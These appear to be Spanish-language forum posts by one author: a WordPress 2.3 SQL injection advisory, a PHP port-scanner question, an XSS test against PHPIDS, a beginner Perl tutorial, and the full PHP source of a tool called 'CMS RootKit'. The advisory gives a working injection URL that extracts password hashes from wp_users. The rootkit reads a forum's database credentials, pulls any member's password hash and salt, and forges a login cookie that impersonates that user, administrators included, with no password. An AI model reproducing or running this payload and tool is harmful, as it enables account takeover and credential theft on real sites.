Una vulnerabilidad de tipo Inyección SQL fue encontrada en wordpress sobre las versiones 2.3 y posteriores.

Localmente hice pruebas y la version 2.3.1 no es afectada, de todas formas es recomendable utilizar sistemas de protección adicionales como PHPIDS o filtros que impidan un query con inyecciones SQL.

Ejemplo:

    http://localhost/wordpress/index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/  UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/    FROM/**/wp_users%23

Esto también puede complementarse con una noticia posterior donde puedes tener acceso como administrador con tan solo tener acceso de lectura a la base de datos:
http://whk.h4ck1ng.net/2007-11.20/vulnerabilidad-en-la-autentificacion-de-cookies-dentro-de-wordpress/

Fuentes:
http://www.abelcheung.org/advisory/20071210-wordpress-charset.txt
http://www.cl.cam.ac.uk/~sjm217/advisories/wordpress-cookie-auth.txt
http://whk.h4ck1ng.net/2007-11.20/vulnerabilidad-en-la-autentificacion-de-cookies-dentro-de-wordpress/
http://seclists.org/bugtraq/2007/Dec/0127.html
http://trac.wordpress.org/ticket/2394
http://seclists.org/bugtraq/2007/Nov/0274.html
http://h4ck1ng.net/index.php/topic,1036.0.html
http://whk.h4ck1ng.net/2007-12.15/inyeccion-sql-en-wordpress-23-y-posteriores/

También está el pwnpress que hace todo el trabajo sucio automaticamente


http://www.info-pull.com/code.dynp

Hola, estaba tratando de crear un port scanning en php pero de mucha velocidad donde se creara un proceso por cada 100 puertos para que fuera algo muy rápido pero me encontré con la sorpresa que no existe fork en php y me arrojó un error al ejecutarlo :-/

Busqué en php.net y encontré la función proc_open() que talvés pueda simular una función fork ejecutando /usr/local/bin/php para poder crear una función legitima fork(), me pueden dar una mano?

Por ejemplo:

$puerto = 1;
while ($puerto <= 1000) {
 if(!@fsockopen($host, $puerto, $errno, $errstr, 30)) { 
  echo "$puerto cerrado<br />\n";
 } else {
  echo "$puerto abierto<br />\n";
 }
$puerto++;
}

Hacerlo tardaría muchisimo pero con fork sería una solución

function escanear($host, $puerto_desde, $puerto_hasta){
 while ($puerto_desde <= $puerto_hasta) {
  if(!@fsockopen($host, $puerto_desde, $errno, $errstr, 30)) { 
   echo "$host:$puerto_desde cerrado<br />\n";
  } else {
   echo "$host:$puerto_desde abierto<br />\n";
  }
  $puerto_desde++;
 }
}
 
escanear("127.0.0.1", "1", "1000");
escanear("192.168.1.69", "1", "1000");
escanear("200.200.200.200", "1", "1000");
escanear("10.10.10.10", "1", "1000");
escanear("216.93.175.75", "1", "1000");
etc....

Imagina todo esto en diferentes procesos, uno por cada escaneo.

Hola, estoy creando un sistema en PHP que se basa en la administración de sistemas CMS, la idea es poder aprender de cada uno... smf, wordpress, etc.

Por ejemplo con tan solo visualizarlo en un directorio de smf podras iniciar seción como cualquier usuario sin la necesidad del password entendiendo la estructura de la cookie, tambien quiero hacerlo para wordpress entre otras cosas mas.

Hice la pagina pero quiero subirla como pagina demostrativa en http://lab.jccharry.com/ pero para eso necesito verificar bien que no tenga alguna vulnerabilidad como por ejemplo alguna inyección sql ya que se basa en consultas a la base de datos. De todas formas lo haré en una cuenta aparte sin derechos de sobreescribir nada ni de leer otras bases de datos pero prefiero evitar antes que lamentar.

<?php
 
#################################################
# Archivo 			: rk.php	#
# Nombre 			: CMS RootKit	#
# Version			: 2.3 Beta    	#
# Autor  			: WHK         	#
# Sistemas CMS soportados	: SMF 1.1.4	#
#################################################
 
// Declaraciones, variables y constantes ============================================
$rk_path_smf		= "./Settings.php";
$rk_path_wordpress	= "./wp-config.php";
$rk_cms 		= rk_filtro($_GET["CMS"]);
$rk_id			= rk_filtro($_GET["id"]);
// $rk_tipo_user	= rk_filtro($_GET["tipo_user"]);
$rk_username		= rk_filtro($_GET["username"]);
$rk_cookiename		= urlencode($_GET["cookiename"]);
$rk_id_MEMBER		= rk_filtro($_GET["ID_MEMBER"]);
$rk_id_GROUP		= rk_filtro($_GET["ID_GROUP"]);
$rk_passwd		= rk_filtro($_GET["passwd"]);
$rk_passwordSalt	= rk_filtro($_GET["passwordSalt"]);
$rk_header		= "<!DOCTYPE html PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\">
<html>
<head>
<title>CMS RootKit by WHK</title>
</head>
<body style=\"color: rgb(255, 255, 255); background-color: rgb(102, 0, 0);\" alink=\"white\" link=\"white\" vlink=\"white\">\n<div style=\"text-align: center;\">
<big>
<span style=\"font-weight: bold;\"><a href=\"?\">CMS RootKit by WHK</a></span>
</big><br />
</div><br /><br />
<table style=\"text-align: center; width: 100%; font-weight: bold;\" border=\"0\">
<tbody>
<tr>
<td>Herramientas</td>
</tr>
</tbody>
</table>
<table style=\"text-align: center; width: 100%;\" border=\"1\" cellpadding=\"0\" cellspacing=\"0\">
<tbody>
<tr>
<td><a href=\"?CMS=crear\">Crear cookie</a></td>
</tr>
</tbody>
</table>
<br /><br />";
$rk_footer		= "</body>
</html>";
$rk_consola_a		= "<span style=\"font-style: italic; font-weight: bold;\">Debugger</span><br />
<table style=\"text-align: left; width: 100%; color: rgb(51, 255, 51);\" border=\"2\" cellpadding=\"0\" cellspacing=\"0\">
<tbody>
<tr>
<td style=\"background-color: rgb(0, 0, 0);\">\n";
$rk_consola_b		= "</td>
</tr>
</tbody>
</table>\n";
$rk_contenido_1		= "<br /><br />
<span style=\"font-weight: bold;\"> Haz click sobre el sistema CMS que deseas administrar.</span>\n";
$rk_contenido_2		= "<span style=\"font-weight: bold;\">Ingrese el nombre de usuario registrado para iniciar seci&oacute;n, o si 
lo prefieres puedes ingresar &uacute;nicamente el numero de usuario registrado.
(No se requiere password).<br /><br />
</span>
<form method=\"get\">
<input name=\"CMS\" value=\"SMF\" type=\"hidden\">
<table border=\"0\" cellpadding=\"1\" cellspacing=\"0\">
<tbody>
<tr>
<td>Username:&nbsp;</td>
<td><input name=\"username\" type=\"text\"></td>
<td><input value=\"Ingresar\" type=\"submit\"></td>
</tr>
</form>
<form method=\"get\">
<input name=\"CMS\" value=\"SMF\" type=\"hidden\">
<tr>
<td>Id N&ordm;:&nbsp;</td>
<td><input name=\"id\" type=\"text\"></td>
<td><input value=\"Ingresar\" type=\"submit\"></td>
</tr>
</tbody>
</table>
</form>\n";
$rk_error_1		= "Falta cookiename";
$rk_error_2		= "Falta ID_MEMBER";
$rk_error_3		= "Falta passwd";
$rk_error_4		= "Falta passwordSalt";
$rk_error_5		= "Falta ID_GROUP";
$rk_comando_0		= "root@system:~$ <br />\n";
$rk_comando_1		= "root@system:~$ rk&nbsp;-cms verificar<br />\n";
$rk_comando_2		= "root@system:~$ rk&nbsp;-cms $rk_cms<br />\n";
$rk_comando_3		= "root@system:~$ rk&nbsp;-cms $rk_cms -username $rk_username<br />\n";
$rk_comando_4		= "root@system:~$ rk&nbsp;-cms $rk_cms -cookiename $rk_cookiename -ID_MEMBER $rk_id_MEMBER -passwd *** -passwordSalt $rk_passwordSalt<br />\n";
// ==================================================================================
 
// Funciónes ========================================================================
// Filtro ---------------------------------------------------------------------------
function rk_filtro($rk_input){
 $rk_referer = htmlspecialchars($_SERVER['HTTP_REFERER']);
 $rk_filtro = array("`", "´", '"', "<", ">", ";", "'", "%60", "%C2%B4", "%22", "%3E", "%3C","%27", "%25", "%");
 for ($rk_i=0; $rk_i < count($rk_filtro) ; $rk_i++) {
  if(eregi($rk_filtro[$rk_i],$rk_input)) { 
 echo "<center>Por razones de seguridad no puede mostrarse la p&aacute;gina debido a que has ingresado<br />
uno o mas caracteres prohibidos (".htmlspecialchars($rk_filtro[$rk_i]).") dentro de alg&uacute;n campo.<br /><br />
<a href=\"$rk_referer\">Buelva a intentarlo por favor</a>.</center>\n";
   exit(1);
  }
 }
return mysql_escape_string(htmlspecialchars($rk_input, ENT_QUOTES));
}
// ----------------------------------------------------------------------------------
 
// Verificación de sistemas CMS -----------------------------------------------------
function rk_verificar($rk_vcms, $rk_path){
 if (file_exists($rk_path)) {
  rk_consola("Se ha detectado un sistema <a style=\"color: rgb(51, 255, 51);\" href=\"?CMS=$rk_vcms\">$rk_vcms</a> en este directorio.");
  return false;
 } else {
  return true;
 }
}
// ----------------------------------------------------------------------------------
 
// Mensaje de error -----------------------------------------------------------------
function rk_error($rk_ferror){
 echo "<font style='color: red'>[!] $rk_ferror</font><br />\n";
 return true;
}
// ----------------------------------------------------------------------------------
 
// Mensaje rojo ---------------------------------------------------------------------
function rk_msg_rojo($rk_fcolor){
 echo "<span style=\"font-weight: bold; color: rgb(204, 0, 0);\">$rk_fcolor</span>";
}
// ----------------------------------------------------------------------------------
 
// Mensaje verde --------------------------------------------------------------------
function rk_msg_verde($rk_fcolor){
 echo "<span style=\"font-weight: bold; color: rgb(0, 153, 0);\">$rk_fcolor</span>";
}
// ----------------------------------------------------------------------------------
 
// Mensaje multicolor ---------------------------------------------------------------
function rk_msg_multicolor($rk_fcolor, $verificar){
 if($verificar == "1"){
  rk_msg_rojo($rk_fcolor);
 } else {
  rk_msg_verde($rk_fcolor);
 }
}
// ----------------------------------------------------------------------------------
 
// Mensaje de consola ---------------------------------------------------------------
function rk_consola($rk_fconsola){
 echo "[*] $rk_fconsola<br />\n";
}
// ----------------------------------------------------------------------------------
// ==================================================================================
 
// Inicio ===========================================================================
if($rk_cms == ""){
 echo $rk_header;
 echo $rk_consola_a;
 echo $rk_comando_1;
 rk_consola("Verificando sistemas CMS ...");
 
// Verificando sistemas CMS... -----------------------------------------------------
 if (!rk_verificar("SMF", $rk_path_smf)) {
  $rk_b = "1";
 }
 
 if (!rk_verificar("Wordpress", $rk_path_wordpress)) {
  $rk_b = "1";
 }
// ----------------------------------------------------------------------------------
 
 if ($rk_b != "1") {
  rk_error("No se ha detectado ning&uacute;n sistema CMS.<br />\n");
  echo "<br />$rk_comando_0\n";
  echo $rk_consola_b;
  echo $rk_footer;
  exit(1);
 } else {
  echo "<br />$rk_comando_0\n";
  echo $rk_consola_b;
  echo $rk_contenido_1;
  echo $rk_footer;
  exit(0);
 }
}
// ==================================================================================
 
// Crear cookie =====================================================================
$rk_e = "1";
if($rk_cms == "crear") {
if ($rk_cookiename	== "") { $rk_f1 = "1"  ; $rk_e++ ; }
if ($rk_id_MEMBER	== "") { $rk_f2 = "1"  ; $rk_e++ ; }
if ($rk_passwd		== "") { $rk_f3 = "1"  ; $rk_e++ ; }
if ($rk_passwordSalt	== "") { $rk_f4 = "1"  ; $rk_e++ ; }
if ($rk_id_GROUP	== "") { $rk_f5 = "1"  ; $rk_e++ ; }
if ($rk_e == "6") {
 echo $rk_header;
 echo "<span style=\"font-weight: bold; text-decoration: underline;\">SMF</span>
<form method=\"get\">
<table style=\"text-align: left; width: 100%;\" border=\"1\"
 cellpadding=\"1\" cellspacing=\"0\">
  <tbody>
    <tr>
      <td>
      <input name=\"CMS\" value=\"crear\" type=\"hidden\">
      <table border=\"0\" cellpadding=\"1\" cellspacing=\"0\">
        <tbody>
          <tr>
            <td>cookiename:&nbsp;</td>
            <td><input name=\"cookiename\" type=\"text\"></td>
          </tr>
          <tr>
            <td>ID_MEMBER:&nbsp;</td>
            <td><input name=\"ID_MEMBER\" type=\"text\"></td>
          </tr>
          <tr>
            <td>Passwd (HASH):&nbsp;</td>
            <td><input name=\"passwd\" type=\"text\"></td>
          </tr>
          <tr>
            <td>passwordSalt:&nbsp;</td>
            <td><input name=\"passwordSalt\" type=\"text\"></td>
          </tr>
          <tr>
            <td>ID_GROUP:&nbsp;</td>
            <td><input name=\"ID_GROUP\" type=\"text\"></td>
            <td><input value=\"Generar cookie\" type=\"submit\"></td>
          </tr>
        </tbody>
      </table>
      </td>
    </tr>
  </tbody>
</table>
</form>
<br />
Ingresa los siguientes datos para generar tu cookie.";
 echo $rk_footer;
} else {
if ($rk_e  >= "2") { 
 echo "$rk_header $rk_consola_a $rk_comando_4";
 if ($rk_f1 == "1") { rk_error("$rk_error_1"); }
 if ($rk_f2 == "1") { rk_error("$rk_error_2"); }
 if ($rk_f3 == "1") { rk_error("$rk_error_3"); }
 if ($rk_f4 == "1") { rk_error("$rk_error_4"); }
 if ($rk_f5 == "1") { rk_error("$rk_error_5"); }
 echo "<br />$rk_comando_0\n$rk_consola_b ";
 echo "<br /><span style=\"font-weight: bold; text-decoration: underline;\">SMF</span>
<form method=\"get\">
<table style=\"text-align: left; width: 100%;\" border=\"1\"
 cellpadding=\"1\" cellspacing=\"0\">
  <tbody>
    <tr>
      <td>
      <input name=\"CMS\" value=\"crear\" type=\"hidden\">
      <table border=\"0\" cellpadding=\"1\" cellspacing=\"0\">
        <tbody>
          <tr>
            <td>";rk_msg_multicolor("cookiename:", $rk_f1);echo"&nbsp;</td>
            <td><input name=\"cookiename\" type=\"text\" value=\"$rk_cookiename\"></td>
          </tr>
          <tr>
            <td>";rk_msg_multicolor("ID_MEMBER:", $rk_f2);echo"&nbsp;</td>
            <td><input name=\"ID_MEMBER\" type=\"text\" value=\"$rk_id_MEMBER\"></td>
          </tr>
          <tr>
            <td>";rk_msg_multicolor("Passwd (HASH):", $rk_f3);echo"&nbsp;</td>
            <td><input name=\"passwd\" type=\"text\" value=\"$rk_passwd\"></td>
          </tr>
          <tr>
            <td>";rk_msg_multicolor("passwordSalt:", $rk_f4);echo"&nbsp;</td>
            <td><input name=\"passwordSalt\" type=\"text\" value=\"$rk_passwordSalt\"></td>
          </tr>
          <tr>
            <td>";rk_msg_multicolor("ID_GROUP:", $rk_f5);echo"&nbsp;</td>
            <td><input name=\"ID_GROUP\" type=\"text\" value=\"$rk_id_GROUP\"></td>
            <td><input value=\"Generar cookie\" type=\"submit\"></td>
          </tr>
        </tbody>
      </table>
      </td>
    </tr>
  </tbody>
</table>
</form>
<br />
Ingresa los siguientes datos para generar tu cookie.";
 echo $rk_footer;
}
 
if ($rk_e == "1") {
 echo $rk_header;
 echo $rk_consola_a;
 echo $rk_comando_4;
 if($rk_id_GROUP == "1") {
  // Administrador
  rk_consola("Construyendo cookie...");
  rk_consola("Datos:");
  echo "<font style='color: red'>\n[!] cookiename: $rk_cookiename<br />\n";
  echo "[!] ID_MEMBER: $rk_id_MEMBER<br />\n";
  echo "[!] passwd (hash): $rk_passwd<br />\n";
  echo "[!] passwordSalt: $rk_passwordSalt</font><br />\n";
  rk_consola("Cookie : $rk_cookiename=".urlencode("a:4:{i:0;s:1:\"$rk_id_MEMBER\";i:1;s:40:\"".sha1($rk_passwd.$rk_passwordSalt)."\";i:2;i:1196740416;i:3;i:0;}"));
  echo "<br />$rk_comando_0\n";
  echo $rk_consola_b;
  echo $rk_footer;
 }
 if($rk_id_GROUP == "0") {
  // Usuario
  rk_consola("Construyendo cookie...");
  rk_consola("Datos:");
  echo "<font style='color: red'>\n[!] cookiename: $rk_cookiename<br />\n";
  echo "[!] ID_MEMBER: $rk_id_MEMBER<br />\n";
  echo "[!] passwd (hash): $rk_passwd<br />\n";
  echo "[!] passwordSalt: $rk_passwordSalt</font><br />\n";
  rk_consola("Cookie : $rk_cookiename=".urlencode("a:4:{i:0;i:$rk_id_MEMBER;i:1;s:40:\"".sha1($rk_passwd.$rk_passwordSalt)."\";i:2;i:1196740416;i:3;i:0;}"));
  echo "<br />$rk_comando_0\n";
  echo $rk_consola_b;
  echo $rk_footer;
 }
}
}
}
// ==================================================================================
 
// SMF ==============================================================================
if($rk_cms == "SMF") {
 echo $rk_header;
 echo $rk_consola_a;
 if($rk_username != ""){
  echo $rk_comando_3;
 } else {
  echo $rk_comando_2;
 }
// Verificando la existencia de SMF -------------------------------------------------
 rk_consola("Verificando sistema SMF...");
 if (file_exists($rk_path_smf)) {
  define("SMF", 1);
  include($rk_path_smf);
 rk_consola("Verifici&oacute;n satisfactoria.");
 } else { 
  rk_error("No existe el sistema CMS en este directorio.");
  echo "<br />$rk_comando_0\n";
  echo $rk_consola_b;
  echo $rk_footer;
  exit(1);
 }
 
// Definiendo conexión SQL ---------------------------------------------------------
 define (SERVER, $db_server);
 define (USER, 	$db_user);
 define (PASS, 	$db_passwd);
 define (DB,   	$db_name);
// ----------------------------------------------------------------------------------------
 
// Función de la consulta SQL -------------------------------------------------------
function rk_db_query($rk_sql){
 if (!$rk_conectar = @mysql_pconnect(SERVER, USER, PASS)){
  rk_error("Error en la conecci&oacute;n.");
  return false; 
 }
 if (!@mysql_select_db(DB,$rk_conectar) ){
  rk_error("Error al seleccionar la base de datos.");
  return false;
 }
 if (!$rk_query = @mysql_query($rk_sql,$rk_conectar) ){
  rk_error("Error al efectuar la busqueda.");
  return false; 
 }
 return $rk_query; 
}
 
// Verificando ID_MEMBER y memberName ------------------------------------------------
 $rk_consulta2 = "SELECT ID_MEMBER FROM `".$db_prefix."members`";
 if ($rk_id != "") {
  $rk_consulta = "SELECT * FROM `".$db_prefix."members` WHERE ID_MEMBER = $rk_id";
  $c_ = "1";
 }
 
 if ($c_ != "1") {
  if ($rk_username != "") {
   $rk_consulta = "SELECT * FROM `".$db_prefix."members` WHERE `memberName` LIKE CONVERT(_utf8 '$rk_username' USING latin1) COLLATE latin1_swedish_ci";
  }
 }
 
// Buscando usuario ------------------------------------------------------------------
 rk_consola("Conectando...");
 if(($rk_username == "") and ($rk_id == "")){
  if ($rk_query = rk_db_query($rk_consulta2)){
   $rk_whk = "1";
   while ($rk_row = mysql_fetch_row($rk_query)){
    foreach ($rk_row as $rk_out)
     $rk_whk++;
   }
   $rk_whk_out = $rk_whk - 1;
   rk_consola("Conecci&oacute;n satisfactoria.");
  }
  rk_consola("Numero de usuarios registrados: $rk_whk_out");
  echo "<br />$rk_comando_0\n";
  echo $rk_consola_b;
  echo $rk_contenido_2;
  echo $rk_footer;
  exit(0); 
 
 } else {
  if ($rk_query = rk_db_query($rk_consulta)){
   rk_consola("Conecci&oacute;n satisfactoria.");
   if ($c_ == "1") {
    rk_consola("Buscando usuario N&ordm;$rk_id ...");
   } else {
    rk_consola("Buscando usuario $rk_username...");
   }
   $rk_whk = 1;
   while ($rk_row = mysql_fetch_row($rk_query)){
    foreach ($rk_row as $rk_out){
     if ($rk_whk == "1" ){ $rk_idMEMBER_out 	= $rk_out; }
     if ($rk_whk == "2" ){ $rk_usernameout 	= $rk_out; }
     if ($rk_whk == "5" ){ $rk_idGROUP_out 	= $rk_out; }
     if ($rk_whk == "14"){ $rk_passwd_out 	= $rk_out; }
     if ($rk_whk == "52"){ $rk_passwordSalt_out	= $rk_out; }
     $rk_whk++;
    }
   }
  }
 }
 
// Aplicando cookie ------------------------------------------------------------------
 if($rk_idGROUP_out == "1") {
  // Administrador
  rk_consola("Usuario encontrado. Construyendo cookie...");
  rk_consola("Datos:");
  echo "<font style='color: red'>\n[!] cookiename: $cookiename<br />\n";
  echo "[!] Username: $rk_usernameout<br />\n";
  echo "[!] ID_MEMBER: $rk_idMEMBER_out<br />\n";
  echo "[!] passwd (hash): $rk_passwd_out<br />\n";
  echo "[!] passwordSalt: $rk_passwordSalt_out<br />\n";
  echo "[!] ID_GROUP: $rk_idGROUP_out (Administrador)</font><br />\n";
  echo "<script>void(document.cookie='$cookiename=".urlencode("a:4:{i:0;s:1:\"$rk_idMEMBER_out\";i:1;s:40:\"".sha1($rk_passwd_out.$rk_passwordSalt_out)."\";i:2;i:1196740416;i:3;i:0;}")."');</script>\n";
  rk_consola("Cookie aplicada.");
 }
 if($rk_idGROUP_out == "0") {
  // Usuario
  rk_consola("Usuario encontrado. Construyendo cookie...");
  rk_consola("Datos:");
  echo "<font style='color: red'>\n[!] cookiename: $cookiename<br />\n";
  echo "[!] Username: $rk_usernameout<br />\n";
  echo "[!] ID_MEMBER: $rk_idMEMBER_out<br />\n";
  echo "[!] passwd (hash): $rk_passwd_out<br />\n";
  echo "[!] passwordSalt: $rk_passwordSalt_out<br />\n";
  echo "[!] ID_GROUP: $rk_idGROUP_out (Usuario)</font><br />\n";
  echo "<script>void(document.cookie='$cookiename=".urlencode("a:4:{i:0;i:$rk_idMEMBER_out;i:1;s:40:\"".sha1($rk_passwd_out.$rk_passwordSalt_out)."\";i:2;i:1196740416;i:3;i:0;}")."');</script>\n";
  rk_consola("Cookie aplicada.");
 }
 if($rk_idGROUP_out == "") {
  // Ninguno
  rk_error("Usuario inexistente.<br />\n");
 }
echo "<br />$rk_comando_0\n";
echo $rk_consola_b;
echo $rk_contenido_2;
echo $rk_footer;
} 
// ----------------------------------------------------------------------------------
// ==================================================================================
 
// Wordpress ========================================================================
if($rk_cms == "Wordpress") {
 echo $rk_header;
 echo $rk_consola_a;
 echo $rk_comando_2;
 rk_error("En construcci&oacute;n.");
 echo "<br />$rk_comando_0\n";
 echo $rk_consola_b;
 echo $rk_footer;
}
// ==================================================================================
 
?>

Acá les dejo el avance del sistema, si alguien ve alguna falla antes de subirlo porfavor que me lo pueda decir.
todavía no está 100% terminado pero si operativo.
Una copia del código lo dejé acá:
http://foro.jccharry.com/index.php?topic=42.0
donde explico el fin de este archivo.

Que yo sepa Linux y Unix no es GNU y lo que la mayoría usamos es GNU/Linux asi que pienso que al llamarse esa sección "Hacking Linux/Unix" significa que no hay hacking en GNU el cual usamos nosotros. UNIX no es un SistemaOperativo libre, no así GNU que utiliza el kernel de Linux sobre el cual existen sus distritos que todos conocen... ubuntu, ututo, red hat, bsd, etc etc.

Yo opino que esa sección devería llamarse "Hacking GNU-Unix/Linux" o "Hacking Linux/GNU/Unix"de esta forma también abarcamos los kernels que no son linux... es mas... ni si quiera devería llamarse Linux ya que con nombrar ambos Sistemas Operativos ya lo abarcamos. ¿Que tal "Hacking GNU -Unix" ??

Bién decía Richard Stallman "GNU (GNU No es Unix)"

Estaba instalando phpids en una prueba en mi localhost para implementarlo en joomla y va todo bién exepto por este script que no me lo filtra:

http://127.0.0.1/joomla/phpids/docs/examples/example.php?test='" onload();

Si pongo una comilla simple o doble si me lo filtra pero al poner eso completo no.
De todas formas un ataque de tipo <input type="text" name="mail" value="" > donde en una petición GET se rellene ese input puede provocar un XSS.

Todo está configurado por defecto. Hice algo mal? o hay que avisar?

Como veo que no hay mucho material de Perl acá y si varios interesados... les dejo un tutorial que acabo de hacer... otro dia termino la segunda parte.


Al igual que ustedes yo también aprendo por lo cual quiero compartir lo que yo se con ustedes para que todos juntos podamos aprender cada ves mas.

Perl es un lenguaje scripting interpretado, eso significa que necesitamos un software que leerá nuestros scripts y los ejecutará.
Les demostraré que tan facil puede ser aprender este lenguaje tan flexible, útil y facil de aprender.
Este tutorial va dedicado a usuarios de Linux en todas sus distribuciones ya que por defecto viene el software que ejecutará nuestros scripts llamado “Perl”, en el caso de Windows tendrás que instalar “Active Perl” y “Cygwin” para acomodar cada función de linux y hacer mas poderosos nuestros scripts.

Mi primer script
Abrimos nuestro editor de texto (en Linux podemos usar gedit, kwrite o lo que sea... en Windows usaremos el block de notas) y comenzaremos a crear nuestro primer script:

#!/usr/bin/perl -w
#test.pl
 
print "hola\n";
exit(0);

¿Que significa cada linea, como lo ejecutamos y que hace?
Cada linea que comienza con el carácter "#" será omitido al momento de ejecutarse el script, esto significa que son comentarios o cualquier cosa que quieras escribirle, esto no se ejecutará ni será tomado en cuenta.
En el caso de linux esto significa que es un código en perl e indica la dirección de perl, esto siempre Debes ponerlo al rpincipio, si no lo pones no pasa nada pero si se hace por costumbre para identificar que es un script en perl. Al pasar el mouse sobre el archivo este tomará el ícono de ejecutable devido a esa primera linea y será cosiderado un "script en Perl".

#!/usr/bin/perl -w

Ahora pongo un comentario para indicar el nombre del archivo (esto no es obligación pero yo lo puse para mayor orden).

#test1.pl

Ahora ejecutamos un print para escribir en pantalla la palabra hola. Esto puede crearse de muchas maneras según lo necesites, también esribimos “\n” el cual significa que al final de la palabra hola se escribirá el carácter “return” para seguir en la linea de abajo.

print "hola\n";

Esto también podemos ejecutarlo de las siguientes maneras:

print "hola";
print("hola");
print 'hola';
print('hola');

Al igual que en el lenguaje C++ puedes utilizar "printf" de la misma manera pero no "echo".

Acá le decimos que es el término del script, puedes no ponerlo pero se hace por costumbre en un buén script. Cuando digo exit(0) significa que no hubo errores, si escribo exit(1) le estoy diciendo al sistema que se produjo un error o los resultados no fueron lo esperado, esto lo puedes utilizar en complementos que veremos en otra oportunidad.
exit(0);

¿Como lo ejecutamos?
Guardaremos nuestro texto en el escritorio como test1.pl y desde la consola de comandos ejecutaremos lo siguiente:
En Linux:  perl ./test.pl
En Windows: c:\perl\perl.exe "%homepath%\escritorio\test.pl"

Nos aparecerá la palabra hola

Ahora para practicar escribiremos algunos textos en pantalla:

#!/usr/bin/perl -w
#test2.pl
 
print "hola,\n";
print "Como puedes ver acá escribio que sea sin problemas y con el carácter '\\n' hago return.\n";
printf "También puedo utilizar printf de la misma manera. Ahora vamos a salir del programa:\n";
exit(0);
print("Como ves esto no se ejecuta porque ya salí :p");

While y for
Estas dos funciones son muy útiles para automatizar todo un proceso:

#!/usr/bin/perl -w
#test3.pl
 
my $cuenta = 1;
 
#-------------------------------------------------------------------------------------------------
print "Escribiremos desde 000 hasta 100\n";
for $i ( "000" .. "100" ) { 
print "$i\n"; 
}
#-------------------------------------------------------------------------------------------------
print "Escribiremos 100 más, pero con while:\n";
while ( $cuenta <= 100 ) {
print "$cuenta\n"; 
$cuenta++;
}
#-------------------------------------------------------------------------------------------------
print "Fijate que si no le pongo comillas no tomará los ceros al comienzo:\n";
for $i ( 000 .. 100 ) { 
print "$i\n"; 
}
#-------------------------------------------------------------------------------------------------
exit(0);

¿Que tal si me escribes en pantalla 100 veces la frase "no molestaré mas a mis compañeros" ? a Vart de los Simpsons de seguro le gustaría jajaja:

#!/usr/bin/perl -w
#test4.pl
 
for $i ( "000" .. "100" ) { 
print "No molestaré mas a mis compañeros.\n"; 
}
exit(0);

Si te fijas utilizé tres formas diferentes de hacer lo mismo, además con el carácter "#" puse unas lineas para separar cada código y así se vea mas ordenado.

Ustedes dirán... ¿Para que sirve "my $cuenta = 1;"? :

Declaraciones

#!/usr/bin/perl -w
#test5.pl
 
my $saludo = "Hola";
my $nombre = "WHK";
 
print "$saludo $nombre , como estas?";
exit(0);

Esto nos escribirá lo siguiente:

También podemos crear una declaración de diferentes formas:

#!/usr/bin/perl -w
#test6.pl
 
my ($saludo, $nombre); 
$saludo = "Hola";
$nombre = "WHK";
 
print "$saludo $nombre , como estas?\n";
exit(0);

Variables

#!/usr/bin/perl -w
#test7.pl
 
my ($saludo, $nombre); 
unless (@ARGV == 1) { die "uso: $0 Nombre\n" } ($nombre) = @ARGV; 
$saludo = "Hola";
 
print "$saludo $nombre , como estas?\n";
exit(0);
 

¿Que significa esto?
No se asusten :p es facil, es mas... puedes copiar el código y usar siempre el mismo, solo cambias ciertas cosas que te diré ahora,

Cuando ejecutas tu script te dirá lo siguiente:


Si te fijas la primera ves que lo ejecuté me decía como utilizarlo... que primero debería ejecutar el script mas un espacio y el nombre, al ejecutarlo nuevamente le di mi nombre y me lo escribió...

Ahora implementemos variables con declaraciones for o while , no se asusten con tanta palabrería porque no es  tan dificil cuando escribes por ti mismo el código:

#!/usr/bin/perl -w 
#test8.pl 
 
my ($cuenta); 
unless (@ARGV == 1) { die "uso: $0 Cuenta\n" } ($cuenta) = @ARGV; 
 
for $i ( 1 .. $cuenta ) { 
print "Escribiendo $i...\n"; 
} 
 
exit(0);

Esto me dará lo siguiente:

Si quieres agregar mas de una variable tendrás que modificar su código:

#!/usr/bin/perl -w 
#test9.pl 
 
my ($cuenta, $palabra); 
unless (@ARGV == 2) { die "uso: $0 [Palabra] [Cuenta]\n" } ($palabra, $cuenta) = @ARGV; 
 
for $i ( 1 .. $cuenta ) { 
print "$palabra $i...\n"; 
} 
 
exit(0);

Esto quiere decir:

unless (@ARGV == 2) { die "uso: $0 [Palabra] [Cuenta]\n" } ($palabra, $cuenta) = @ARGV; 

Si las variables no son 2 entonces que no ejecute nada y que diga su utilización y si hay dos variables entonces la primera será $palabra y la segunda será $cuenta. Puedes modificar ese orden a tu gusto o agregarles las variables que tu quieras. $0 significa el nombre del mismo archivo que estás ejecutando.

If y Else
Ahora les voy a mostrar algo muy útil:

#!/usr/bin/perl -w 
#test10.pl 
 
my ($cuenta, $palabra); 
unless (@ARGV == 2) { die "uso: $0 [Palabra] [Cuenta]\n" } ($palabra, $cuenta) = @ARGV; 
 
if ($cuenta == 0) {
     $cuenta = 10;
} 
 
else {
     for $i ( 1 .. $cuenta ) { 
     print "$palabra $i...\n"; 
     } 
}
 
exit(0);

Esto significa que cuando ejecutes el script primeramente verificará la variable:

unless (@ARGV == 2) { die "uso: $0 [Palabra] [Cuenta]\n" } ($palabra, $cuenta) = @ARGV; 

Luego verificará que si la variable $cuenta es igual a cero entonces le asignará el número 10

if ($cuenta == 0) {
     $cuenta = 10;
} 

Si no es igual a cero entonces escribirá en pantalla lo pedido:

else {
     for $i ( 1 .. $cuenta ) { 
     print "$palabra $i...\n"; 
     } 
}

Y como siempre al final termina todo:

exit(0);

Ahora utilizaremos if para saber si existen archivos o no:

#!/usr/bin/perl -w 
#test11.pl 
 
if (-e "test2.pl") {
print "Si existe\n";
} else {
print "No existe\n";
}
 
exit(0);

Lo mismo pero con variables:

#!/usr/bin/perl -w 
#test12.pl 
 
my ($archivo); 
unless (@ARGV == 1) { die "uso: $0 [archivo]\n" } ($archivo) = @ARGV; 
 
if (-e $archivo) {
print "$archivo si existe\n";
} else {
print "$archivo no existe\n";
}
 
exit(0);

Ahora que ya sabes un poco mas sobre scripts en Perl deverás practicar creando tus propios códigos cada ves más complejos o hasta donde esté tu conocimiento e imaginación.

En el próximo número publicaré un script que estoy creando, como averigüé sobre cada función y muchas otras cosas más como el uso de sockets y uso de comandos system();.

Saludos y hasta la próxima. Att. WHK.
Puedes bajar el documento en formato odt en tar.gz desde acá

